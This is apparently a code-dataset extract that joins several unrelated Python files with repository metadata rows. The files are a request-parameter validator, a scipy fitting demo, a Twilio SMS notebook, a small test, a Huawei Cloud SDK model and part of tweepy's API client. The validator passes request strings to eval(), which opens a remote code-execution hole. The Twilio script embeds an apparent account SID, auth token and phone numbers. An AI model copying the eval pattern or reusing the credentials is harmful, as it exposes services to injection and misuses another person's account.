Convert XML request parameters into JSON format
:param request: the incoming request
:return:
"""
try:
data = request.data
temp = data.decode('utf-8')
if temp == '':
return {}
try:
param_temp = xml_to_json(temp)
except Exception as e:
return response_code.REQUEST_PARAM_FORMAT_ERROR
param = json.loads(param_temp)
root = model_json.get('root')
body = model_json.get('body')
root_data = param.get(root)
request_param = None
if root_data:
body_data = root_data.get(body)
if body_data:
if isinstance(body_data,list):
request_param = is_none(root_data)
else:
request_param = is_none(body_data)
if root_data is None:
s_body_data = param.get(body)
if s_body_data:
if isinstance(is_none(s_body_data), dict):
request_param = s_body_data
if isinstance(request_param, list) or request_param is None:
return False
return request_param
except Exception as e:
lg.error(e)
return False
def _json_request(self, request):
"""
Handle JSON request parameters
:param request: the incoming request
:return:
"""
try:
request_data = request.data
req_str = request_data.decode()
if req_str == '':
form_data = request.form
data = {}
for key in form_data:
try:
data[key] = json.loads(form_data[key])
except:
data[key] = form_data[key]
return data
data = json.loads(req_str)
if isinstance(data, list):
return False
return data
except JSONDecodeError as e:
lg.error(e)
return False
def verify_one_param_type(self, param_name, value, type=None):
"""
Validate the type of a single parameter
:param param_name: name of the parameter being validated
:param value: value of the parameter being validated
:param type: expected type of the parameter
:return:
"""
try:
if type == float:
v = None
if isinstance(value,str):
v = eval(value)
if isinstance(value,int):
v = value
if isinstance(value,float):
v = value
if isinstance(v, float):
pass
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
if type == int:
v = None
if isinstance(value, str):
v = eval(value)
if isinstance(value, float):
v = value
if isinstance(value, int):
v = value
if isinstance(v, int):
pass
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
if type == str:
if isinstance(value, str):
pass
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
if type == list:
v = None
if isinstance(value, list):
pass
elif isinstance(value, str):
try:
v = list(value)
except:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
if type == dict:
if isinstance(value, dict):
pass
elif isinstance(value, str):
try:
v = dict(value)
except:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
except Exception as e:
lg.error(e)
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
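# Illustrative results of the branches above (values are examples only):
#   verify_one_param_type('ratio', '1.5', float)  # -> None: eval('1.5') yields a float
#   verify_one_param_type('count', 'abc', int)    # -> BAD_REQUEST dict: eval() raises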
def verify_one_param_must(self, request_data: dict, param):
"""
Check that a required parameter is present
:param request_data: the request data
:param param: the field being validated
:return:
"""
if request_data.get(param) is None:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_must(param)
return code
else:
pass
def verify_one_param(self, request_data: dict, param):
"""
Check whether a parameter is missing from the request data
:param request_data: the request data
:param param: the field being checked
:return:
"""
if request_data.get(param) is None:
return True
else:
return False
def verify_param_page(self, data, param):
"""
Validate the pagination information
:param data: the request data being validated
:param param: the field holding the page information
:return:
"""
page_data = data.get(param)
if page_data.get('page_size') is not None:
if page_data.get('current_page') is None:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_must('current_page')
return code
if page_data.get('current_page') is not None:
if page_data.get('page_size') is None:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_must('page_size')
return code
def request_process(self, request, xml=None, model_json=None):
"""
Extract the request parameters
:param request: the incoming request
:param xml: request/response type; whether it is XML (default is JSON)
:return:
"""
if xml is None:
return self._json_request(request)
if xml == 'xml':
return self._xml_request(request, model_json)
def verify_all_param_must(self, request_data: dict, fields: list):
"""
Batch-check that required parameters are present
:param request_data: the request parameter data
:param fields: ['a','b']
:return:
"""
for i in fields:
must = self.verify_one_param_must(request_data, i)
if must:
return must
else:
pass
def verify_all_param(self, request_data: dict, fields: dict):
"""
Batch-validate parameters, falling back to defaults for missing or mistyped values
:param request_data: the request parameter data
:param fields: {'a': {'type': str, 'default': ...}, ...}
:return:
"""
if type(fields) == tuple:
fields = fields[0]
for i in fields:
must = self.verify_one_param(request_data, i)
if must:
request_data[i] = fields[i]['default']
else:
param_type = self.verify_one_param_type(i, request_data[i], fields[i]['type'])
if param_type:
request_data[i] = fields[i]['default']
return request_data
def verify_all_param_type(self, request_data: dict, fields: dict):
"""
Batch-validate the types of the parameters
:param request_data: the request parameter data
:param fields: {'a':str,'b':int}
:return:
"""
for k, v in request_data.items():
param_type = self.verify_one_param_type(k, v, fields.get(k))
if param_type:
return param_type
else:
pass
def verify_version(self, version, xml=None):
"""
API version validation
:param version: the version information
:param xml: whether the response is XML
:return:
"""
if version == apiVersion.version1.value:
return True, True
else: # message returned when the version does not exist
result = response_code.REQUEST_VERSION_ISEXISTENCE
return False, response_result_process(result, xml=xml)
req = requestProcess()
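# A minimal usage sketch for the module-level `req` instance above; the
# field names and the Flask request object are hypothetical:
#
#     data = req.request_process(flask_request)  # parsed JSON body
#     err = req.verify_all_param_must(data, ['name', 'id'])  # None when all present
#     err = err or req.verify_all_param_type(data, {'name': str, 'id': int})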
| 31.659375 | 94 | 0.506169 |
4a259356256bf8a59000df1ef418e32d7b8a73ea | 1,308 | py | Python | PythonRearrangement/fittest.py | QuantumQuadrate/Rearrangement | 5f8d64bd18a471a488747ed8d17b00304b4ab293 | [
"MIT"
] | null | null | null | PythonRearrangement/fittest.py | QuantumQuadrate/Rearrangement | 5f8d64bd18a471a488747ed8d17b00304b4ab293 | [
"MIT"
] | 1 | 2019-06-18T23:13:45.000Z | 2019-06-18T23:13:45.000Z | PythonRearrangement/fittest.py | QuantumQuadrate/Rearrangement | 5f8d64bd18a471a488747ed8d17b00304b4ab293 | [
"MIT"
] | 2 | 2019-05-23T15:52:20.000Z | 2021-07-03T15:25:19.000Z | import numpy as np
from scipy.optimize import curve_fit
def getfitparams(fitdata):
"""
Generates fitting parameters to estimate frequencies of the lattice sites from provided values.
fitdata is of the form [(siteNum, fX,fY),...].
"""
def func(X,a,b,c):
x,y = X
return a*x+b*y+c
#Collect our fitting data
xfreqs = []
yfreqs = []
xcoords = []
ycoords = []
#triplet of the form (siteNum, fX, fY)
for triplet in fitdata:
ycoords.append(triplet[0] // 11)
xcoords.append(triplet[0] % 11)
xfreqs.append(triplet[1])
yfreqs.append(triplet[2])
#Provide initial guesses and get our fit parameters
guessx = 5.,1.,130.
guessy = 1.,5.,130.
fitvalsx = curve_fit(func, (xcoords,ycoords), xfreqs, guessx)[0]
fitvalsy = curve_fit(func, (xcoords,ycoords), yfreqs, guessy)[0]
return fitvalsx,fitvalsy
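# Worked example of the linear model being fit: using the demo coefficients
# below, (xa, xb, xc) = (5, 1, 130), site 24 on the 11-wide lattice has
# x = 24 % 11 = 2 and y = 24 // 11 = 2, so f = 5*2 + 1*2 + 130 = 142.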
xa = 5
xb = 1
xc = 130
ya = 1
yb = 5
yc = 130
xs = [(num % 11)*xa + (num // 11)*xb + xc + np.random.random() for num in range(121)]
ys = [(num % 11)*ya + (num // 11)*yb + yc + np.random.random() for num in range(121)]
ran = np.random.randint(0, 121, size=7)
fit = []
for num in ran:
fit.append( (num,xs[num],ys[num]))
print(fit)
(px, py) = getfitparams(fit)
print(px)
print(py)
| 23.781818 | 99 | 0.619266 |
4a259805fed00bb05917fa83c33d40a61adeb1a9 | 754 | py | Python | API e JSON/PYTHON_EXE.py | DouglasCarvalhoPereira/Especializaco-Python | 7dface66ef0c86e183e5a5f1a2c9e6f753647d69 | [
"MIT"
] | null | null | null | API e JSON/PYTHON_EXE.py | DouglasCarvalhoPereira/Especializaco-Python | 7dface66ef0c86e183e5a5f1a2c9e6f753647d69 | [
"MIT"
] | null | null | null | API e JSON/PYTHON_EXE.py | DouglasCarvalhoPereira/Especializaco-Python | 7dface66ef0c86e183e5a5f1a2c9e6f753647d69 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# # Python to exe with simple scripts
#
# ### Scripts that do not interact with other files or tools on the computer
#
# We will use the pyinstaller library
#
# - Step 1 - Install pyinstaller
# - Step 2 - Run pyinstaller
#
#
# pyinstaller -w nome_do_arquivo.py
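#
# A typical build session might look like this (shell commands, not Python;
# `-w` suppresses the console window and the binary lands in `dist/`):
#
# pip install pyinstaller
# pyinstaller -w PYTHON_EXE.py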
# In[ ]:
from twilio.rest import Client
# SID daminha conta TWILIO em twilio.com/console
account_sid = 'ACdfdcabb817fabeca3216cc0e26dd8c92'
#Token de autenticação da minha conta Twilio
auth_token = 'a3d505b7d3af090c2130c5942687211b'
client = Client(account_sid, auth_token)
message = client.messages.create(to='+5524988219104', from_='+12565675179', body='Testando envio de SMS via twilio.')
print(message.sid)
# In[ ]:
| 19.333333 | 117 | 0.742706 |
4a2598f7c1ae94d2f328aa46608d0db4307408ef | 260 | py | Python | test_pair_to_number.py | clean-code-craft-tcq-2/well-named-in-py-Mageshwari-Kannan | 43496100ed66ec94c01100aa391c449ff561fd25 | [
"MIT"
] | null | null | null | test_pair_to_number.py | clean-code-craft-tcq-2/well-named-in-py-Mageshwari-Kannan | 43496100ed66ec94c01100aa391c449ff561fd25 | [
"MIT"
] | null | null | null | test_pair_to_number.py | clean-code-craft-tcq-2/well-named-in-py-Mageshwari-Kannan | 43496100ed66ec94c01100aa391c449ff561fd25 | [
"MIT"
] | null | null | null | from get_pair_number_from_color import get_pair_number_from_color
def test_pair_to_number(major_color, minor_color, expected_pair_number):
pair_number = get_pair_number_from_color(major_color, minor_color)
assert(pair_number == expected_pair_number)
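# Hypothetical usage — the expected pair number depends on the mapping
# implemented in get_pair_number_from_color:
# test_pair_to_number('Black', 'Orange', 12)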
| 43.333333 | 73 | 0.853846 |
4a25992c9138a01d0e5aa601f434d519af07594a | 6,003 | py | Python | huaweicloud-sdk-cloudpipeline/huaweicloudsdkcloudpipeline/v2/model/show_instance_status_response.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | 1 | 2021-11-03T07:54:50.000Z | 2021-11-03T07:54:50.000Z | huaweicloud-sdk-cloudpipeline/huaweicloudsdkcloudpipeline/v2/model/show_instance_status_response.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-cloudpipeline/huaweicloudsdkcloudpipeline/v2/model/show_instance_status_response.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowInstanceStatusResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'task_id': 'str',
'task_status': 'str',
'pipeline_id': 'str',
'pipeline_name': 'str',
'pipeline_url': 'str'
}
attribute_map = {
'task_id': 'task_id',
'task_status': 'task_status',
'pipeline_id': 'pipeline_id',
'pipeline_name': 'pipeline_name',
'pipeline_url': 'pipeline_url'
}
def __init__(self, task_id=None, task_status=None, pipeline_id=None, pipeline_name=None, pipeline_url=None):
"""ShowInstanceStatusResponse - a model defined in huaweicloud sdk"""
super(ShowInstanceStatusResponse, self).__init__()
self._task_id = None
self._task_status = None
self._pipeline_id = None
self._pipeline_name = None
self._pipeline_url = None
self.discriminator = None
if task_id is not None:
self.task_id = task_id
if task_status is not None:
self.task_status = task_status
if pipeline_id is not None:
self.pipeline_id = pipeline_id
if pipeline_name is not None:
self.pipeline_name = pipeline_name
if pipeline_url is not None:
self.pipeline_url = pipeline_url
@property
def task_id(self):
"""Gets the task_id of this ShowInstanceStatusResponse.
Instance ID
:return: The task_id of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._task_id
@task_id.setter
def task_id(self, task_id):
"""Sets the task_id of this ShowInstanceStatusResponse.
Instance ID
:param task_id: The task_id of this ShowInstanceStatusResponse.
:type: str
"""
self._task_id = task_id
@property
def task_status(self):
"""Gets the task_status of this ShowInstanceStatusResponse.
Instance creation status
:return: The task_status of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._task_status
@task_status.setter
def task_status(self, task_status):
"""Sets the task_status of this ShowInstanceStatusResponse.
Instance creation status
:param task_status: The task_status of this ShowInstanceStatusResponse.
:type: str
"""
self._task_status = task_status
@property
def pipeline_id(self):
"""Gets the pipeline_id of this ShowInstanceStatusResponse.
Pipeline ID
:return: The pipeline_id of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._pipeline_id
@pipeline_id.setter
def pipeline_id(self, pipeline_id):
"""Sets the pipeline_id of this ShowInstanceStatusResponse.
Pipeline ID
:param pipeline_id: The pipeline_id of this ShowInstanceStatusResponse.
:type: str
"""
self._pipeline_id = pipeline_id
@property
def pipeline_name(self):
"""Gets the pipeline_name of this ShowInstanceStatusResponse.
Pipeline name
:return: The pipeline_name of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._pipeline_name
@pipeline_name.setter
def pipeline_name(self, pipeline_name):
"""Sets the pipeline_name of this ShowInstanceStatusResponse.
Pipeline name
:param pipeline_name: The pipeline_name of this ShowInstanceStatusResponse.
:type: str
"""
self._pipeline_name = pipeline_name
@property
def pipeline_url(self):
"""Gets the pipeline_url of this ShowInstanceStatusResponse.
Pipeline detail page URL
:return: The pipeline_url of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._pipeline_url
@pipeline_url.setter
def pipeline_url(self, pipeline_url):
"""Sets the pipeline_url of this ShowInstanceStatusResponse.
Pipeline detail page URL
:param pipeline_url: The pipeline_url of this ShowInstanceStatusResponse.
:type: str
"""
self._pipeline_url = pipeline_url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowInstanceStatusResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
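# Minimal usage sketch (the field values below are invented):
#
# resp = ShowInstanceStatusResponse(task_id='t-123', task_status='running')
# print(resp.to_str()) # pretty-printed dict of the model's properties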
| 27.410959 | 112 | 0.597701 |
4a2599c76ff3c653b200271c81d0b9912d0d81d3 | 57,780 | py | Python | tweepy/api.py | jefigo/tweepy | 8811332fe96f4eaf30b2477641338dd4cbf60631 | [
"MIT"
] | 1 | 2020-10-30T09:15:19.000Z | 2020-10-30T09:15:19.000Z | tweepy/api.py | dsogo/tweepy | 64b42e560a71d3bbcf9cb47f039e158a860eb979 | [
"MIT"
] | null | null | null | tweepy/api.py | dsogo/tweepy | 64b42e560a71d3bbcf9cb47f039e158a860eb979 | [
"MIT"
] | 1 | 2022-01-15T16:04:14.000Z | 2022-01-15T16:04:14.000Z | # Tweepy
# Copyright 2009-2020 Joshua Roesslein
# See LICENSE for details.
import imghdr
import mimetypes
import os
import six
from tweepy.binder import bind_api, pagination
from tweepy.error import TweepError
from tweepy.parsers import ModelParser, Parser
from tweepy.utils import list_to_csv
class API(object):
"""Twitter API"""
def __init__(self, auth_handler=None,
host='api.twitter.com', search_host='search.twitter.com',
upload_host='upload.twitter.com', cache=None, api_root='/1.1',
search_root='', upload_root='/1.1', retry_count=0,
retry_delay=0, retry_errors=None, timeout=60, parser=None,
compression=False, wait_on_rate_limit=False,
wait_on_rate_limit_notify=False, proxy=''):
"""
API instance constructor
:param auth_handler:
:param host: url of the server of the rest api,
default: 'api.twitter.com'
:param search_host: url of the search server,
default: 'search.twitter.com'
:param upload_host: url of the upload server,
default: 'upload.twitter.com'
:param cache: Cache to query if a GET method is used, default: None
:param api_root: suffix of the api version, default: '/1.1'
:param search_root: suffix of the search version, default: ''
:param upload_root: suffix of the upload version, default: '/1.1'
:param retry_count: number of allowed retries, default: 0
:param retry_delay: delay in second between retries, default: 0
:param retry_errors: default: None
:param timeout: delay before to consider the request as timed out in
seconds, default: 60
:param parser: ModelParser instance to parse the responses,
default: None
:param compression: If the response is compressed, default: False
:param wait_on_rate_limit: If the api wait when it hits the rate limit,
default: False
:param wait_on_rate_limit_notify: If the api print a notification when
the rate limit is hit, default: False
:param proxy: Url to use as proxy during the HTTP request, default: ''
:raise TypeError: If the given parser is not a ModelParser instance.
"""
self.auth = auth_handler
self.host = host
self.search_host = search_host
self.upload_host = upload_host
self.api_root = api_root
self.search_root = search_root
self.upload_root = upload_root
self.cache = cache
self.compression = compression
self.retry_count = retry_count
self.retry_delay = retry_delay
self.retry_errors = retry_errors
self.timeout = timeout
self.wait_on_rate_limit = wait_on_rate_limit
self.wait_on_rate_limit_notify = wait_on_rate_limit_notify
self.parser = parser or ModelParser()
self.proxy = {}
if proxy:
self.proxy['https'] = proxy
# Attempt to explain more clearly the parser argument requirements
# https://github.com/tweepy/tweepy/issues/421
parser_type = Parser
if not isinstance(self.parser, parser_type):
raise TypeError(
'"parser" argument has to be an instance of "{required}".'
' It is currently a {actual}.'.format(
required=parser_type.__name__,
actual=type(self.parser)
)
)
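# One possible setup, sketched here for orientation (the keys are
# placeholders, not real credentials):
#
# auth = tweepy.OAuthHandler('CONSUMER_KEY', 'CONSUMER_SECRET')
# auth.set_access_token('ACCESS_TOKEN', 'ACCESS_SECRET')
# api = API(auth, wait_on_rate_limit=True)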
@property
def home_timeline(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/timelines/api-reference/get-statuses-home_timeline
:allowed_param: 'since_id', 'max_id', 'count'
"""
return bind_api(
api=self,
path='/statuses/home_timeline.json',
payload_type='status', payload_list=True,
allowed_param=['since_id', 'max_id', 'count'],
require_auth=True
)
def statuses_lookup(self, id_, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-lookup
:allowed_param: 'id', 'include_entities', 'trim_user', 'map',
'include_ext_alt_text', 'include_card_uri'
"""
if 'map_' in kwargs:
kwargs['map'] = kwargs.pop('map_')
return bind_api(
api=self,
path='/statuses/lookup.json',
payload_type='status', payload_list=True,
allowed_param=['id', 'include_entities', 'trim_user', 'map',
'include_ext_alt_text', 'include_card_uri'],
require_auth=True
)(list_to_csv(id_), *args, **kwargs)
@property
def user_timeline(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/timelines/api-reference/get-statuses-user_timeline
:allowed_param: 'id', 'user_id', 'screen_name', 'since_id',
'max_id', 'count', 'include_rts', 'trim_user',
'exclude_replies'
"""
return bind_api(
api=self,
path='/statuses/user_timeline.json',
payload_type='status', payload_list=True,
allowed_param=['id', 'user_id', 'screen_name', 'since_id',
'max_id', 'count', 'include_rts', 'trim_user',
'exclude_replies']
)
@property
def mentions_timeline(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/timelines/api-reference/get-statuses-mentions_timeline
:allowed_param: 'since_id', 'max_id', 'count'
"""
return bind_api(
api=self,
path='/statuses/mentions_timeline.json',
payload_type='status', payload_list=True,
allowed_param=['since_id', 'max_id', 'count'],
require_auth=True
)
@property
def related_results(self):
""" :reference: https://dev.twitter.com/docs/api/1.1/get/related_results/show/%3id.format
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/related_results/show/{id}.json',
payload_type='relation', payload_list=True,
allowed_param=['id'],
require_auth=False
)
@property
def retweets_of_me(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-retweets_of_me
:allowed_param: 'since_id', 'max_id', 'count'
"""
return bind_api(
api=self,
path='/statuses/retweets_of_me.json',
payload_type='status', payload_list=True,
allowed_param=['since_id', 'max_id', 'count'],
require_auth=True
)
@property
def get_status(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-show-id
:allowed_param: 'id', 'trim_user', 'include_my_retweet',
'include_entities', 'include_ext_alt_text',
'include_card_uri'
"""
return bind_api(
api=self,
path='/statuses/show.json',
payload_type='status',
allowed_param=['id', 'trim_user', 'include_my_retweet',
'include_entities', 'include_ext_alt_text',
'include_card_uri']
)
def update_status(self, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-update
:allowed_param: 'status', 'in_reply_to_status_id',
'auto_populate_reply_metadata',
'exclude_reply_user_ids', 'attachment_url',
'media_ids', 'possibly_sensitive', 'lat', 'long',
'place_id', 'display_coordinates', 'trim_user',
'enable_dmcommands', 'fail_dmcommands', 'card_uri'
"""
if 'media_ids' in kwargs:
kwargs['media_ids'] = list_to_csv(kwargs['media_ids'])
return bind_api(
api=self,
path='/statuses/update.json',
method='POST',
payload_type='status',
allowed_param=['status', 'in_reply_to_status_id',
'auto_populate_reply_metadata',
'exclude_reply_user_ids', 'attachment_url',
'media_ids', 'possibly_sensitive', 'lat', 'long',
'place_id', 'display_coordinates', 'trim_user',
'enable_dmcommands', 'fail_dmcommands',
'card_uri'],
require_auth=True
)(*args, **kwargs)
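# Usage sketch (status text and ID are invented): reply to a tweet while
# auto-mentioning its author, per the allowed parameters above:
#
# api.update_status(status='Thanks!', in_reply_to_status_id=123456789,
#                   auto_populate_reply_metadata=True)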
def media_upload(self, filename, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/media/upload-media/api-reference/post-media-upload
:allowed_param:
"""
f = kwargs.pop('file', None)
file_type = imghdr.what(filename) or mimetypes.guess_type(filename)[0]
if file_type == 'gif':
max_size = 14649
else:
max_size = 4883
headers, post_data = API._pack_image(filename, max_size,
form_field='media', f=f,
file_type=file_type)
kwargs.update({'headers': headers, 'post_data': post_data})
return bind_api(
api=self,
path='/media/upload.json',
method='POST',
payload_type='media',
allowed_param=[],
require_auth=True,
upload_api=True
)(*args, **kwargs)
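# Usage sketch (filename is a placeholder): upload an image, then attach
# the returned media ID to a tweet via update_status above:
#
# media = api.media_upload('cat.png')
# api.update_status(status='Look at this', media_ids=[media.media_id])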
def create_media_metadata(self, media_id, alt_text, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/media/upload-media/api-reference/post-media-metadata-create
:allowed_param:
"""
kwargs['json_payload'] = {
'media_id': media_id,
'alt_text': {'text': alt_text}
}
return bind_api(
api=self,
path='/media/metadata/create.json',
method='POST',
allowed_param=[],
require_auth=True,
upload_api=True
)(*args, **kwargs)
def update_with_media(self, filename, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-update_with_media
:allowed_param: 'status', 'possibly_sensitive',
'in_reply_to_status_id',
'in_reply_to_status_id_str',
'auto_populate_reply_metadata', 'lat', 'long',
'place_id', 'display_coordinates'
"""
f = kwargs.pop('file', None)
headers, post_data = API._pack_image(filename, 3072,
form_field='media[]', f=f)
kwargs.update({'headers': headers, 'post_data': post_data})
return bind_api(
api=self,
path='/statuses/update_with_media.json',
method='POST',
payload_type='status',
allowed_param=['status', 'possibly_sensitive',
'in_reply_to_status_id',
'in_reply_to_status_id_str',
'auto_populate_reply_metadata', 'lat', 'long',
'place_id', 'display_coordinates'],
require_auth=True
)(*args, **kwargs)
@property
def destroy_status(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-destroy-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/statuses/destroy/{id}.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def retweet(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-retweet-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/statuses/retweet/{id}.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def unretweet(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-unretweet-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/statuses/unretweet/{id}.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def retweets(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-retweets-id
:allowed_param: 'id', 'count'
"""
return bind_api(
api=self,
path='/statuses/retweets/{id}.json',
payload_type='status', payload_list=True,
allowed_param=['id', 'count'],
require_auth=True
)
@property
def retweeters(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-retweeters-ids
:allowed_param: 'id', 'cursor', 'stringify_ids'
"""
return bind_api(
api=self,
path='/statuses/retweeters/ids.json',
payload_type='ids',
allowed_param=['id', 'cursor', 'stringify_ids']
)
@property
def get_user(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-users-show
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/users/show.json',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name']
)
@property
def get_oembed(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-oembed
:allowed_param: 'id', 'url', 'maxwidth', 'hide_media',
'omit_script', 'align', 'related', 'lang'
"""
return bind_api(
api=self,
path='/statuses/oembed.json',
payload_type='json',
allowed_param=['id', 'url', 'maxwidth', 'hide_media',
'omit_script', 'align', 'related', 'lang']
)
def lookup_users(self, user_ids=None, screen_names=None, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-users-lookup
:allowed_param: 'user_id', 'screen_name', 'include_entities',
'tweet_mode'
"""
return bind_api(
api=self,
path='/users/lookup.json',
payload_type='user', payload_list=True,
method='POST',
allowed_param=['user_id', 'screen_name', 'include_entities',
'tweet_mode']
)(list_to_csv(user_ids), list_to_csv(screen_names), *args, **kwargs)
def me(self):
""" Get the authenticated user """
return self.get_user(screen_name=self.auth.get_username())
@property
def search_users(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-users-search
:allowed_param: 'q', 'count', 'page'
"""
return bind_api(
api=self,
path='/users/search.json',
payload_type='user', payload_list=True,
require_auth=True,
allowed_param=['q', 'count', 'page']
)
@property
def get_direct_message(self):
""" :reference: https://developer.twitter.com/en/docs/direct-messages/sending-and-receiving/api-reference/get-event
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/direct_messages/events/show.json',
payload_type='direct_message',
allowed_param=['id'],
require_auth=True
)
@property
def list_direct_messages(self):
""" :reference: https://developer.twitter.com/en/docs/direct-messages/sending-and-receiving/api-reference/list-events
:allowed_param: 'count', 'cursor'
"""
return bind_api(
api=self,
path='/direct_messages/events/list.json',
payload_type='direct_message', payload_list=True,
allowed_param=['count', 'cursor'],
require_auth=True
)
def send_direct_message(self, recipient_id, text, quick_reply_type=None,
attachment_type=None, attachment_media_id=None):
"""
Send a direct message to the specified user from the authenticating
user
"""
json_payload = {
'event': {'type': 'message_create',
'message_create': {
'target': {'recipient_id': recipient_id},
'message_data': {'text': text}
}
}
}
message_data = json_payload['event']['message_create']['message_data']
if quick_reply_type is not None:
message_data['quick_reply'] = {'type': quick_reply_type}
if attachment_type is not None and attachment_media_id is not None:
message_data['attachment'] = {'type': attachment_type}
message_data['attachment']['media'] = {'id': attachment_media_id}
return self._send_direct_message(json_payload=json_payload)
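# Usage sketch (IDs invented): a plain-text DM with a media attachment
# previously uploaded through media_upload():
#
# api.send_direct_message(recipient_id='783214', text='hello',
#                         attachment_type='media',
#                         attachment_media_id='1146654567674912769')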
@property
def _send_direct_message(self):
""" :reference: https://developer.twitter.com/en/docs/direct-messages/sending-and-receiving/api-reference/new-event
:allowed_param: 'recipient_id', 'text', 'quick_reply_type',
'attachment_type', attachment_media_id'
"""
return bind_api(
api=self,
path='/direct_messages/events/new.json',
method='POST',
payload_type='direct_message',
allowed_param=['recipient_id', 'text', 'quick_reply_type',
'attachment_type', 'attachment_media_id'],
require_auth=True
)
@property
def destroy_direct_message(self):
""" :reference: https://developer.twitter.com/en/docs/direct-messages/sending-and-receiving/api-reference/delete-message-event
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/direct_messages/events/destroy.json',
method='DELETE',
allowed_param=['id'],
require_auth=True
)
@property
def create_friendship(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/post-friendships-create
:allowed_param: 'id', 'user_id', 'screen_name', 'follow'
"""
return bind_api(
api=self,
path='/friendships/create.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name', 'follow'],
require_auth=True
)
@property
def destroy_friendship(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/post-friendships-destroy
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/friendships/destroy.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def show_friendship(self):
